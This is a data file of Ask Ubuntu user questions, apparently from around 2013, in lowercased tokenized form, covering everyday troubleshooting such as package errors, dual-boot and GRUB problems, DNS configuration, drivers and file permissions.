327453	dhcp server installation error ubuntu 12.04	i am trying to install dhcp server using command `` sudo apt-get install isc-dhcp-server '' . but i got an error . it seems like the mirrored file no longer available . err http : //au.archive.ubuntu.com/ubuntu/ precise-updates/main isc-dhcp-server i386 4.1.esv-r4-0ubuntu5.6 404 not found failed to fetch http : //au.archive.ubuntu.com/ubuntu/pool/main/i/isc-dhcp/isc-dhcp-server_4.1.esv-r4-0ubuntu5.6_i386.deb 404 not found how can i fix the problem ? thanks .
327454	how to install gdm3setup ?	i found this one thing called gdm3setup and it seems like its what i want but i have no idea how to install it . i went on the github website for the project and for ubuntu it has a set of .deb files but i do not know what to do with them . is there a package i can download or do an 'apt-get ' through terminal ?
327455	how can i get a canon canoscan 4400f scanner working in ubuntu ?	i was looking at a canon canoscan 4400f scanner , however canon does not appear to offer a driver for linux is there any other way to get this device to work on ubuntu ?
327456	13.04 on macbook air 2011 - ran update and now boots into osx recovery	recently i wiped os x completely from my macbook air and installed ubuntu 13.04 alone . this worked great because it even booted automatically into ubuntu without needing to hold any keys . today , i ran the ubuntu software update and apparently as the kernel and other things were updated , now it will boot directly into os x recovery . is there a way to fix this and boot into ubuntu automatically again ? i only have ubuntu installed on this machine and i intend to keep it this way . my macbook air is a 13 ' model 4,2 ( late 2011 ) update : if i hold the option key , i can choose the only hdd partition that is present and boot ubuntu , but i 'd like this to happen automatically .
327458	converting images through terminal	i am trying to convert the images using terminal to pdf . though all my images are of same size . but when i convert it to pdf some of images are of correct size but some are too small to read . i want all of same size . convert *.jpg mynewfile.pdf i have also tried convert -resize 1273x899 *.jpg myfile.pdf but issue is same when i check image separately they are of same size .
327461	clock shows incorrect time	please someone tells me why , after installing ubuntu 12.04 , that my clock displays the incorrect time . my operating system time is delayed several hours , and i do n't know how to fix it . thank you .
327468	how can i invest in ubuntu ?	is this even possible for a private person with no major funds ?
327470	install windows vm on ubuntu 12.10	i have a ubuntu 12.10 installed on my laptop . i need to know install windows vm on this platform . i have for googled for responses but did not get any related to my question . hence i am seeking help on this forum
327477	what is 'calculator ' package ?	whenever i am updating , calculator always needs updating . i do n't know what it is . can someone please let me know what this is ? it also shows up when i search in the dash , but it will not launch .
327480	force lease renew for leases in /var/lib/misc/dnsmasq.leases	i have a raspberry pi connected to my laptop ( running 13.04 with gnome ) via direct ethernet using these instructions . normally , the rpi will connect and work just fine . however , if i disconnect the rpi and try to reconnect it before the dhcp lease expires , it wo n't acquire a new lease , and therefore wo n't connect properly ( no ssh access ) . i tried using sudo dhclient -r as per here but that has no effect on the file , it does cancel me dhcp lease to the outside internet .
327483	ubuntu for phones - can not find any carrier	i already installed ubuntu for phones in my galaxy nexus . looks perfect but i am not able connect my phone to any carrier . when i want to choose one manually , it shows only searching all the time [ now about 30 min . ] i used this ubuntu touch wiki tutorial . i am a newbie in this area so please for little help . thanks a lot .
327484	change tab from code using ubuntu sdk	how to change tab using code in qml in ubuntu sdk ? the answer is : if tabs are defined as follows : tabs { id : tabs ... .. } then using this : tabs.selectedtabindex = 0 will get you the first tab , 1 for second and so on . unfortunately , selectedtabindex is the only non-read-only attribute so there is n't something similar to push method in pagestack .
327490	when i am trying to install ubuntu for a dual boot the drive i pick is showing more gigs than it actually is	i am trying to make my laptop dual boot ubuntu and windows 7 . i have read several tutorials out there and once dabbled with linux distros years ago before there really was any tutorials , guides , etc . to help me . so anyways , i have a machine with 2 hard drives . both are 698 gig drives . the first one has windows 7 on it and the partitions on it for recovery , hp tools , etc . it has 4 partitions on it already , but i wanted to install ubuntu on the 2nd hard drive anyway . the 2nd hard drive has nothing at all on it . i never kept any data or anything on it . so when i run the ubuntu installation off of my usb drive and select to set up my partitions for the installation myself ( rather than letting it overwrite or install side by side ) it only shows sdc which is the drive i wanted to install on . i did not expect to see the other drive because it has 4 primary partitions on it already anyhow . the problem ( or may not be i 'm just concerned ) is that it says sdc has 750 gig . however , that drive is only 698 max . it did say that sdc has 14 gig already used which is what windows and gparted show me too . it did say it would unmount it during installation . so i 'm pretty sure its the correct drive , but i 'm confused about the 750 gig . i do not want the installation to accidentally start messing with my windows 7 installation and files on the other hard drive . another source of confusion is when i 'm looking with gparted , i expected the first hard drive with the windows 7 installation to show sda1 , sda2 , etc . for the installation , data , hp tools , recovery , etc . like tutorials on-line show me it should do . however like hp tools is showing up as sdd and the recovery is sdb . while the 2nd hard drive is sdc , not the sdb like i thought it should be named . anyway , i know i 'm more of a newbie but still ... i just want to be sure , then i can start learning more ; now that there is so many more guides out there than there were 10 years ago .
327495	how to use 'rsync ' to copy ubuntu system to another disk ?	i use livecd and rsync -av to copy ubuntu system to another disk ( same machine ) . what needs to be revised ? uuid in boot.cfg . uuid in fstab . anything else ? do i need to revise 'initramfs ' ? thanks
327496	install ubuntu alongside windows 7 without cd drive	i do n't have a cd drive installed in my computer , so i downloaded ubuntu and mounted it with magiciso , wubi only says that the software is ready to install from a restart ( with the cd inside ) ... since i have no cd drive i have no boot options when i restart the pc ... how can i install ubuntu alongside windows 7 ? i remember once ( a few months ago ) i downloaded a version of ubuntu from ubuntu.com that said that it could be installed from windows , and i did installed ubuntu from a some kind of windows installer application and it was all fine , for some reason i uninstalled it and now i can not find the way to do it again how can i achive this ? thank you in advance
327497	ca n't start ubuntu	first of all : i speak spanish . so i hope you understand what i am asking : recently i successfully installed ubuntu 13.04 . so after a week , i turn on my computer and this is what i get . this should n't appear , it has to appear just when i press f10 . so , when i select ubuntu in grub , appears a black screen like this : so after this , i ca n't do anything ... ctrl+alt+del and f10 does n't work ... so i just turn off my computer the bad way . what can i do ?
327498	ssh into a guest vm	i have a centos as a guest vm . my host machine is 13.04 . the centos can see the web but i can not ssh into that vm . my guest machine is centos 6.4 running in virtualbox . from the vm window , i can update via yum and even browse on lynx . it reports an internal ip of 10.0.2.15 . however i can not ssh from my host machine into this one . to double check , i 've even turned off iptables . did i miss any steps ? how might i be able to ssh into the guest from host ? virtualbox session info ifconfig of guest ( centos ) virturalbox network
327502	system not loading after installing nvidia graphic card driver	after an nvidia geforce gtx 470 official driver installation i ca n't see the login screen . i only see a blinking `` _ '' in the top , left corner of a black screen . but i ca n't type anything . i also ca n't run grub ( holding shift while boot ) . after holding the power button i can see some output from the terminal . how can i handle this issue - reinstall/restore the driver or reinstall system ?
327504	screencloud tray icon disappeared	yesterday , after installing mythtv , i uninstalled it realizing that it 's not what i was looking for . with it , mysql server and a few other things installed , so i used software center 's history to see what the other things were and remove them . later , after attempting to run skype , i realize that it 's not installed at all . screencloud , too . after checking history , i see that they were both uninstalled at the same time . i am 100 % positive i did n't do that . but i install them back . skype works perfectly but screencloud 's tray icon is missing . it 's running and snapping when i press the button combo , but i ca n't change settings or do anything with it , there 's no tray icon . if i end it in system monitor and restart it , same results - running but no icon . anyone has an idea what 's wrong here ? thanks in advance .
327509	gparted freeze during ntfs partition resize	as mentioned in the title , gparted froze whilst in the middle of shifting an ntfs partition to the left and increasing it in size to fill the disk space to its right . the last operation it was performing was moving sectors with a block size of 16mb . is there any way i can get it to resume moving or manually do the rest of it ? for an example of what i mean see this post : http : //gparted-forum.surf4.info/viewtopic.php ? pid=25907 # p25907 edit : i 've now discovered the following information : the exact sector at which the copy operation was interrupted is no . 2,529,216,511 . according to the disk 's mbr the partition 's first sector is 202,390 mib from the start of the disk and has a length of 1,705,337 mib - which is what i was supposed to end up with . the extended bpb in the ntfs partition claims the size of the partition is 1,293,319 mib . this is wrong and presumably should have been updated when the copying completed .
327511	music player that supports multiple genres	is there a music player for ubuntu that either supports multiple genres or has a plug-in to support them ? say i have a song with the genre `` metal/instrumental '' ( the separator is n't really important ) . i would like it to show up in both the `` metal '' and `` instrumental '' genres .
327519	uninstall init.d update-rc.d remove	i installed an init.d script with this command : sudo update-rc.d mongodb defaults 98 02 i want to uninstall it , so i 'm planning on running : sudo update-rc.d -f mongodb remove i 'm concerned about the start and stop conditions in the installation command . will running the remove cause the start and stop conditions to be removed also ? are there any implications that i should be aware of ?
327528	virt-manager problem	i installed ubuntu 12.04 server , kernel 3.5.0-37-generic , and the ubuntu gui afterwards . when i start virt-manager and want to create a new vm i get this warning : error : no hypervisor options were found for this connection . i googled all the leads that i could find to fix it , no luck . my setup : the `` vanderpool '' is enabled in bios > egrep ' ( vmx|svm ) ' /proc/cpuinfo shows vmx in the long output list > kvm-ok info : /dev/kvm exists kvm acceleration can be used > lsmod | grep kvm kvm_intel 137888 0 kvm 422160 1 kvm_intel
327529	list stored files using http	i 'm new to ubuntu and linux based os : s and i wonder if someone know a program or a way to list all the files in a folder on my server when im using a webrowser and visiting the ubuntu server . almost the same thing as using ftp and a webbrowser but i want to be able to use http/s and i will not be able to edit or download files . just read the file names in a folder located at `` /home/user/downloads '' . have been looking for hours now and ca n't find a way to do it couse i dont really know what to search for . if anyone could help me , i would really appreciate it ! i currently got apache2 , openssh , lftp installed greetings , david
327532	why would 127.0.0.1 in resolv.conf cause problems in dns resolution ?	[ update and update ii : see my awkward and proper solutions at the end of the question , based on one of the answers ] i have an extremely slow dns lookup when my resolv.conf file includes the 127.0.0.1 ip address , actually , many names do not get resolved at all as it ( most certainly ) times out . i found one question with what looks like a valid answer here : extrememly slow dns lookup except that i can see the the dnsmasq tool is running for the ip range 192.168.122.2 to 192.168.122.254 . this looks like the ips used by virtualbox and qemu , so i would imagine that if i turn off dnsmasq , accessing the internet from a virtual system will fail ! would there be another reason for the slowness and/or timeout ? ( note that the problem is more prominent with specific systems such as the user pictures on all stackoverflow websites , including askubuntu , when the problem occurs . ) at this point i remove the ip from the resolv.conf file and that bypasses the issue while i 'm browsing , but i do n't think that 's the best solution ( and of course that ip is reinstalled there on each reboot ! ) i 'd like a more permanent solution to this problem that still allows me to run the virtual systems as expected . p.s . i do not run the network manager . contents of /etc/network/interfaces note that i had the problem before adding the 2nd ip on eth1 ( i.e . eth1:0 ) . # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth1 iface eth1 inet static address 162.226.130.121 netmask 255.255.255.248 network 162.226.130.120 broadcast 162.226.130.127 gateway 162.226.130.126 auto eth1:0 iface eth1:0 inet static name local network address 192.168.1.1 netmask 255.255.255.0 network 192.168.1.0 broadcast 192.168.1.255 gateway 192.168.1.254 # bridge for virtual box auto br0 iface br0 inet static address 192.168.2.1 netmask 255.255.255.0 network 192.168.2.0 broadcast 192.168.2.255 bridge_ports eth3 bridge_stp off bridge_maxwait 0 bridge_fd 0 contents of the /etc/resolv.conf ( which is still a soft link as expected ) after a boot : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search m2osw.com nameserver 192.168.122.1 nameserver 206.13.31.12 nameserver 206.13.28.12 update : i do not write an answer myself because i very much used another answer here to resolve my issue , although it is really not what i wanted to do , it is the easiest solution at this point . the bug referenced by the resolvconf author below , found here : https : //bugs.launchpad.net/ubuntu/+source/bind9/+bug/933723 clearly states that if you want to use bind9 , you will get the namespace 127.0.0.1 in your resolv.conf file . no choice . ( resolvconf=no does not seem to do anything , although i may have a surprise after a reboot which i will do very soon ! ) as a side note : if i point the /etc/resolvconf/resolv.conf.d/tail softlink to /dev/null ( as mentioned below ) then i get a resolv.conf that looks like this : # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 in other words , i still get the 127.0.0.1 which is the culprit at this point . but also i completely lose the other two nameservers , even though they are clearly specified in my eth1 interface . this being said , looking in the /run/resolvconf/interface/ directory , i see an eth1.net and lo.named files . the lo.named is copied to the resolv.conf , but not the eth1.net . i have no clue how those files get created and then copied to resolv.conf but that is the dynamism used by resolvconf ... anyway , there are two solutions mentioned in the bug : ( 1 ) delete the /etc/resolv.conf soft link and replace it with a plain file with exactly what you want . this may work for you , but i thought that keeping the default dynamic file would be best . ( 2 ) change your bind9 settings so bind can respond to those local dns requests . the interesting thing with that is that names will now be cached on your computer . so it is not all bad . this being said , i was not too interested in opening my nameserver to all domain names ... but this works and i do not have to destroy the dynamic resolv.conf . just in case , there is an example setup for the bind to make that work : options { [ ... ] forwarders { // google dnses 8.8.8.8 ; 8.8.4.4 ; } ; [ ... ] } ; update ii : okay ! the reboot got rid of the lo.named file in the /run/resolvconf/interface directory . that must be because bind knows to create it if resolvconf=yes , but it does not delete it if resolvconf=no . however , a reboot takes care of that because the /run directory is a ram disk . without that file in the way , the /etc/resolv.conf is setup with exactly what i 'd expect which is the list of nameservers as defined in my eth1 definition found in /etc/network/interface as shown earlier . so ... it 's a big mess because there are many factors and in some cases a reboot is required !
327534	ca n't boot ubuntu after installation	i just installed ubuntu on my laptop which currently has windows 7 installed on it as well . somehow when i first rebooted my laptop after installation , it seemed like it failed to boot . after that there appears an option to choose between ubuntu or windows 7 . when i choose ubuntu , it goes back to the first screen which shows the same fail . i forgot what it said . could someone please help me ? i 'm still new to ubuntu and interested in using it . thanks !
327535	package dependencies can not be resolved ! ! please help !	when i try to download something , in this case it was wine , from the ubuntu software center , i get this ... wine1.4 : predepends : dpkg ( > = 1.15.7.2~ ) but 1.16.1.2ubuntu7.1 will be installed depends : libc6 ( > = 2.14 ) but 2.15-0ubuntu10.3 will be installed depends : wine1.4-amd64 ( = 1.4-0ubuntu4 ) but 1.4-0ubuntu4 will be installed depends : wine1.4-i386 ( = 1.4-0ubuntu4 ) but is a virtual package i 'm a recent ubuntu user so , i do n't get any of this x :
327541	receiving file with ubuntu one url	i have the url for a large ubuntu one file . this file is very large ( android build system ) and i am unable to complete the download without errors using wget . i have another try running right now and it is estimated to finish in 20 hours . i 'm getting about 4mb/s down . can i add this url into my own unbuntu one folders ? then the ubuntu one syncing mechanism could reliably get a copy onto my computer using a protocol more reliable than http get ?
327543	how can a debian package install python modules from pypi	this question tries to complement this one . i have a python app which uses third party modules from pypi . i want to package my app into a debian package , but do n't know how to handle python dependencies which are not in debian/ubuntu repositories ( packed as debian packages too ) solution # 1 : build the modules from pypi right into my debian package . solution # 2 : create debian packages for all pypi modules i need using stdeb and add them to debian/ubuntu repositories . i actually need a solution # 3 because i want to install pypi dependencies when i install my debian package , preferably into a virtualenv ! what would be solution # 3 ? do i need to tweak debian/preinst maintainer script ?
327545	is there a way to run my windows vb.net program through mono ?	i 'm still a newbie , but i wrote a program in visual studio express 2012 on windows with references to an api through a .dll and .net framework 4.0 . if i try it on ubuntu , i get messages like `` could not load file or assembly '' . is there a way to run this on ubuntu ? if so , how do i get it to work ?
327551	eclipse only starts with sudo command from terminal	i have to start by saying that i have just switched to ubuntu from windows and i am new to linux in general . coming from windows , i really am not familiar with how exactly the permissions work , the linux file system , where i am able to create folders that i can use without the sudo command etc . i use eclipse on a daily basis for android development and other simple java swing projects . i was able to download and extract the latest available version of eclipse ( kepler ) to this path : /opt/eclipse . inside this directory is the eclipse executable and other eclipse related files . i also installed the jdk and verified with the java -version command . it says : java version `` 1.7.0_25 '' java ( tm ) se runtime environment ( build 1.7.0_25-b15 ) java hotspot ( tm ) 64-bit server vm ( build 23.25-b01 , mixed mode ) i am running on a 64 bit cpu architecture so both programs are the 64 bit version . now , my problem is that if i open eclipse from the unity dash or from the file explorer , it give me this error : however if i run sudo eclipse in the terminal , everything runs just fine as long as i do it as the super user . i have a hunch that the jdk is installed in a folder that is restricted to normal users and only works if i run the sudo command but this is just a hunch . as i said , i am new to linux and i am not really sure what i am doing wrong here , i am learning as i go . i need a good explanation as to how to make it start from the unity dock without the sudo command . thanks in advance !
327552	installing ubuntu 12.04 as windows application	i am currently trying to use ubuntu without leaving windows . i have downloaded ubuntu 12.04 lts . i ran wubi to install it as a windows application but it required the installation of an image of the operating system from the internet and displayed an error message `` could n't retrieve system image '' or something like that . my question is why it need to connect to the internet . i used ubuntu 11.10 and did the same with no problem . why it needs to download files from the internet although the file size 695 mb , and contain the windows installer file wubi.exe .
327554	springseed wo n't run ?	installed springseed here ( http : //www.omgubuntu.co.uk/2013/07/springseed-note-taking-app-for-ubuntu ) : note taking app on ubuntu 12.04 lts i386 , just wont work . it pretty much installed correctly , downloaded the .deb from the website here ( http : //getspringseed.com/ ) and installed it via software center . the thing just wo n't start ? on clicking the icon post- installation , blah , no gui , nothing shows up et all ! ? is it with me only ? uninstalled the app , downloaded again and ran it , no success . care to comment ? ! thanks .
327556	missing /var/www lubuntu 13.04	i found a guide on enabling sftp on ubuntu and it mentions the directory /var/www . so i checked my /var directory and it was n't there . i saw evidence that it could be in a different folder so i used locate /*/www but the output was bashie @ tinylinbook : /srv $ locate /*/www bashie @ tinylinbook : /srv $ ; nothing . do i need this directory or will sftp sort itself out ? i would really appreciate help .
327560	how to fix `` dl failure '' / `` invalid elf header '' error while installing matlab ?	i tried installing matlab r2013a with this command : sudo ./install -javadir /usr/lib/jvm/java-7-openjdk-amd64/jre and i got this massege : preparing installation files ... installing ... /tmp/mathworks_2573/sys/java/jre/glnxa64/jre/bin/java -xmx512m -splash : '' /home/yair/matinstall/java/splash.png '' -djava.ext.dirs=/tmp/mathworks_2573/sys/java/jre/glnxa64/jre/lib/ext : /tmp/mathworks_2573/java/jar : /tmp/mathworks_2573/java/jar/ja_jp/ : /tmp/mathworks_2573/java/jar/zh_cn/ : /tmp/mathworks_2573/java/jarext : /tmp/mathworks_2573/java/jarext/axis2/ : /tmp/mathworks_2573/java/jarext/guice/ : /tmp/mathworks_2573/java/jarext/webservices/ com/mathworks/professionalinstaller/launcher -root `` /home/yair/matinstall '' -tmpdir `` /tmp/mathworks_2573 '' error : dl failure on line 864 error : failed /tmp/mathworks_2573/sys/java/jre/glnxa64/jre/lib/amd64/server/libjvm.so , because /tmp/mathworks_2573/bin/glnxa64/libstdc++.so.6 : invalid elf header finished does anyone know what 's the problem ?
327561	where do i find drivers for intel hd 4000/nvidia gt 640m laptop ?	i just completely moved from windows to xubuntu 13.04 on my gigabyte u2442 laptop . specs : intel core i5-3210m 8gb ddr iii ram 128gb ssd intel hd 4000 nvidia geforce gt 640m what i would like to know is where i can install drivers ? i presume after drivers are installed my battery life would be better , which is another issue in itself . but yeah if anyone knows where to/how to get these drivers it would be greatly appreciated ! : )
327562	how can i recursively run chmod -x ?	so i have my music collection living on my 12.04.2 server . this collection has traveled with me over the years from a windows machine to a macbook pro , and then finally to where it is today on the server . i have noticed that for some reason all of my 'folder.jpg ' ( cover photos ) are highlighted green on the terminal ( signaling that they are executable ) . if i run chmod -x folder.jpg the terminal will then show them in a light purple ( signaling some form of media file ) . now i 'm not worried about the color , per se , but i have two questions . a ) why are my .jpgs being given the executable bit ? ( probably from windows screwing with them , i 'm sure ) , and b ) how can i recursively run chmod -x *.jpg from the top of my music hierarchy ? when i try chmod -r -x *.jpg from the top level , i get : mediausr @ mediasrv : /space/music $ chmod -r -x *.jpg chmod : can not access `*.jpg ' : no such file or directory bonus question : all of the folders are colored for 'other writable ' , while new folders i create are colored correctly for 'directory ' . i 'm not super worried about this at all , as it does not involve things being executable , but you know , if someone could enlighten me on a recursive way of making the system see them as straight up directories , that would be awesome . :0 ) thanks for all of your input .
327575	dual boot windows 7 and ubuntu with ssd and hdd	so i have an acer laptop that has both an hdd and ssd . i have been having trouble dual booting ubuntu with windows . for some reason ubuntu does not recognize windows and i do not want to wipe out windows hard drive ... ive done this 3 times already on accident ha ( first time i lost windows 8 but i hated it anyway ) . i was wondering if it was okay to keep windows on my hdd and just install ubuntu on my ssd ( 20 gb ) ? or in anyone has an alternate solution i am all ears.. thanks !
327584	will the ubuntu edge work with 800mhz cdma networks in india	i am based in india using reliance , cdma for cdma in india , the frequencies are : 824 - 844 mhz for the uplink ( handset to base station ) 869 - 889 mhz for the downlink ( base station to handset ) 20 mhz band for uplink & downlink . carrier freq . is 1.25mhz since i am interested in purchasing the phone , and the phone does not come cheap , can you guys confirm that it will work in india . thanks nitin
327588	can not access copied folder in htdocs of lampp in ubuntu ?	i want to move my web content from window 7 to ubuntu 12.04 . so i copy my web content and move it to my /opt/lampp/htdocs folder , then i have change the folder permission using : : 1 ) sudo -s 2 ) cd /opt/lampp/htdocs 3 ) sudo chmod 777 -r mywebcontent then folder permission is changed . but still i can not access my php file , because it only change the folder 's access permission , not a single php file 's permission . how can i solve this ?
327594	db.changeversion does n't work as expected	i 'm trying to upgrade a db in an app . i use qtquick.localstorage 2.0 . when i call db.changeversion it works , but db.version does n't change until app restarts . db.changeversion ( db.version , `` 2 '' , function ( tx ) { ... } ) ; // update database to version 2 console.log ( db.version ) ; //should return `` 2 '' , instead returns previous version of database how can have the new db.version without restart the app ?
327597	how to order the ubuntu phone ?	yes , of course , i want that ubuntu phone . where is the order now button ?
327601	how to transfer files from one server to another ?	i have two servers online both have dedicated ips both are 12.04 and with plesk panel . the problem is on my one server the files are more than 11 gb i wan to transfer them from one server to another what is the best possible solution for this ? both servers has good internet speeds and online 24 hours i want to transfer them from one to another . ftp ? ssh ?
327602	ubuntu 12.04 installed via wubi failed to boot problem	i downloaded the ubuntu iso file from the internet and i mounted the iso image via daemon tool and ran the wubi.exe to install ubuntu on a newly partitioned hard drive in windows 7 . it installed successfully but when i reboot the laptop . i got the following error below . now i was just curious and wanted to see what ubuntu would look like . however , i was able to start window normally , so i logged onto my window account and immediately format the hard drive with ubuntu installed and appended the disk space to my original hard drive . i restarted the laptop again . i got the same error . i have read many threads of this sort . but they all require a inserting window installation disc , which i do n't have . what should i do ? i am a very nontechnical person and i do n't understand any linux/unix stuff and this is why i do n't understand much from those similar threads . i just want to remove ubuntu completely from my laptop now . i also want to ask does `` startup repair '' remove everything in my laptop ? windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc0000000e info : the selected entry could not be loaded because the application is missing or corrupt .
327605	deleted hal.dll ?	i think this may be a windows problem . can not start ubuntu 12.04 . get message windows\system32\hal.dll is missing or damaged . it is n't . and windows xp runs normally .
327607	installation of windows os via gparted live cd	i just burned the gparted live on cd to start the installation of windows on ibm laptop operating on ubuntu 12.04 lts . what are the elementary basics to boot cd on laptop ? for example , what is the step by step process ( i.e . changing bios to recognize cd when booting ) ? are there any specific screens , commands in this process ?
327614	where to find files downloaded with apt-get ?	i am trying to follow a post on another forum for installing conky on zorian 7 ( ubuntu 13 ) , anyway i did the sudo apt-get thing , then the directions say to `` copy files x1 , x2 , x3 to the home folder '' . the problem is it does n't say where the files are located , and i ca n't find them . i 've used the terminal cmds , locate , find , and a couple of others i do n't remember now . i 've already asked several other questions on the other site today , and feel bad about asking another one . anyway thanks for the help .
327621	is it stable to install gnome 3.8 on ubuntu 13.04 ?	i have installed kde on my ubuntu 12.04 before , and it worked fine for me until i tried to update it . when i tried to update , the ubuntu software center broke , and i ca n't install anything . i have asked this on this site but no one answered it . then i have installed ubuntu 13.04 , and i want to know is it safe and stable to install gnome 3.8 on my ubuntu ?
327626	hi i can not download anything from the software center nor can i get my updates to install , i get this error	reading package lists ... error ! e : write error - write ( 9 : bad file descriptor ) e : the package lists or status file could not be parsed or opened . david @ david-inspiron-n5110 : ~ $
327630	ubuntu not showing up in bootloader menu	i 'm not too sure what to google to find an answer , so i came here . my computer had windows 7 on it , then i installed ubuntu 13.04 . then i created a separate partition and installed windows 7 on it again . doing this brought my bios back from grub to the windows one , and on the menu it now shows two windows 7 's , and not the ubuntu . all partitions are still there . there are files on the ubuntu partition that i would like to have back . can someone help me boot back into ubuntu or introduce me to software that allows me to look at and transfer the files on the partition elsewhere ? if it helps , i have a dell xps l502x .
327631	ubuntu 13.04 kernel panic after installing laptop-mode tools	since my laptop was overheating i first installed jupiter . at that point there was no problem . but then i installed laptop-mode tools . now the problem is every time i try to switch from battery to ac power or vice versa i am having kernel panic . after i removed the laptop-mode tools the problem is not there . but i really want to use the laptop-mode as it really helps to make my laptop a bit more cooler . any help is appreciated as i am not very aware of technicalities . also there does not seem to be many such issues in 13.04 , at least i could not find it .
327632	dual boot windows 8 and ubuntu 13.04 on two drives	i 'm trying to boot ubuntu 13.04 and windows 8 on my aspire s7 . i have two ssds and i installed ubuntu first on one then windows 8 on the other after a while . i can boot into either os by entering the bios settings and changing the boot drive but i would rather have grub do the boot selection . i 've tried running sudo update-grub but that does n't find windows at all . if i run $ sudo grub-install /dev/sdabootcurrent : 0003 timeout : 2 seconds bootorder : 0003,0002,0001 boot0001* windows boot manager boot0002* hdd0 : boot0003* hdd0 : bootcurrent : 0003 timeout : 2 seconds bootorder : 0000,0003,0002,0001 boot0001* windows boot manager boot0002* hdd0 : boot0003* hdd0 : boot0000* ubuntu installation finished . no error reported . which seems to pick up windows , but there is still no grub entry . any ideas how to get grub to give me the option when i boot ?
327634	kolab 3.0 sources	i 'm attempting to install kolab 3.0 following these steps on 12.04 server , yet showpkg still shows 2.2.4 : ~ $ cat /etc/apt/sources.list.d/kolab.list deb http : //mirror.kolabsys.com/pub/ubuntu/kolab-3.0/ precise release updates deb-src http : //mirror.kolabsys.com/pub/ubuntu/kolab-3.0/ precise release updates : ~ $ cat /etc/apt/preferences.d/pin-kolab package : * pin : origin mirror.kolabsys.com pin-priority : 501 : ~ $ sudo apt-get update : ~ $ sudo apt-cache showpkg kolabd package : kolabd versions : 2.2.4-20100624-4ubuntu1 ( /var/lib/apt/lists/au.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages ) description language : file : /var/lib/apt/lists/au.archive.ubuntu.com_ubuntu_dists_precise_universe_binary-amd64_packages md5 : c6d1151f02f88bd000b128ea0a4bf411 description language : en file : /var/lib/apt/lists/au.archive.ubuntu.com_ubuntu_dists_precise_universe_i18n_translation-en md5 : c6d1151f02f88bd000b128ea0a4bf411 reverse depends : libkolab-perl , kolabd 2.2.1-20081212-1 libkolab-perl , kolabd 2.2.1-20081212-1 dependencies : 2.2.4-20100624-4ubuntu1 - libnet-netmask-perl ( 0 ( null ) ) libmail-box-perl ( 0 ( null ) ) libterm-readkey-perl ( 0 ( null ) ) libterm-readline-gnu-perl ( 0 ( null ) ) postfix ( 2 2.4 ) postfix-ldap ( 2 2.4 ) sasl2-bin ( 0 ( null ) ) libsasl2-modules ( 0 ( null ) ) libkolab-perl ( 2 1:2.2.1-20081212-1 ) kolab-cyrus-admin ( 16 ( null ) ) dovecot-metadata-plugin ( 0 ( null ) ) kolab-cyrus-clients ( 16 ( null ) ) dovecot-common ( 0 ( null ) ) kolab-cyrus-imapd ( 16 ( null ) ) dovecot-imapd ( 0 ( null ) ) kolab-cyrus-pop3d ( 16 ( null ) ) dovecot-pop3d ( 0 ( null ) ) php-kolab-filter ( 0 ( null ) ) php-kolab-freebusy ( 0 ( null ) ) adduser ( 0 ( null ) ) lsb-base ( 2 3.0-3 ) openssl ( 0 ( null ) ) db4.2-util ( 0 ( null ) ) kolab-webadmin ( 0 ( null ) ) amavisd-new ( 0 ( null ) ) clamav ( 0 ( null ) ) clamav-daemon ( 0 ( null ) ) spamassassin ( 0 ( null ) ) slapd ( 0 ( null ) ) ldap-utils ( 0 ( null ) ) kolab-freebusy ( 3 2.2.1 ) kolab-freebusy : i386 ( 3 2.2.1 ) kolab-resource-handlers ( 3 2.2.1 ) kolab-resource-handlers : i386 ( 3 2.2.1 ) kolab-freebusy ( 3 2.2.1 ) kolab-freebusy : i386 ( 3 2.2.1 ) kolab-resource-handlers ( 3 2.2.1 ) kolab-resource-handlers : i386 ( 3 2.2.1 ) provides : 2.2.4-20100624-4ubuntu1 -
327635	how does `` show desktop '' work ?	how does super+d work to show the desktop ? does it minimize all windows ? or does it set the desktop as `` on top '' ? or does it make all windows invisible ? can i exclude certain windows/applications from `` show desktop '' ?
327640	how to emulate xinput device with directinput gamepad ?	i 'm trying to get a logitech dual action controller to work with bastion , on ubuntu 13.04 . from what i 've gathered , bastion is only compatible with xinput devices , and my controller only supports directinput . in fact , the game will recognize most of the buttons except for button 7 ( left trigger ) and button 10 ( the 'start ' button on a console gamepad ) . is it possible to somehow emulate an xinput device , like the xbox 360 controller ?
327648	unable to find hadoop-env.sh in hadoop folder	i am trying to install hadoop on ubuntu 12.04 . i followed the following article . http : //www.michael-noll.com/tutorials/running-hadoop-on-ubuntu-linux-single-node-cluster/ i have installed hadoop as per the instruction given in this tutorial . i have installed hadoop-0.23.9.tar.gz , though the site mentions an older version . it also mentions about updating hadoop-env.sh file . i could not find this file under /usr/local/hadoop/conf . there is no directory 'conf ' under hadoop directory . it could be that this file is located somewhere else due to version change , but i am unable to find it . i want to know where this configuration file is located under the main hadoop directory .
327649	tar - command different to 10 years ago ?	with this question am asking `` old rabbits '' of ubuntu resp . of debian . am puzzled by the `` newer '' use of command tar - i know that 10 years ago it was possible to tar a file to 1/3 of size or even less ! simply by this : tar -zcf filename.tgz filename.extension . ( important is point at end after space ! - this was compressing very strong . ) now point has no effect any more - instead it has effect of compressing all given files in the current directory together to one bundle ? today i only can use tar like this : tar -zcf filename.tgz filename.extension ( without space and without point ) - this way the file is only compressed slightly to 2/3 of size ? ! am i doing something wrong - or has the old feature with tar-command been forgotten about this feature with point after space ? !
327650	i can not delete a folder in a usb drive	i 've removed the usb key while the system was saying something like finishing writing , do not remove usb stick but i wasnât looking at the screen so could n't catch the on-screen warning . now i have a stuck folder in my drive . if i try to delete it i get an input/output error in nautilus . the stick seems to work fine though . any advise on how to remove the folder ? need to format the stick ?
327655	how to make ubuntu run as one screen on both laptop monitor and tv	i 'm using my tv as a monitor to watch movies on my laptop , which is running 13.04 , and i was wondering : how i can make it show my laptops screen on both my tv and laptop ?
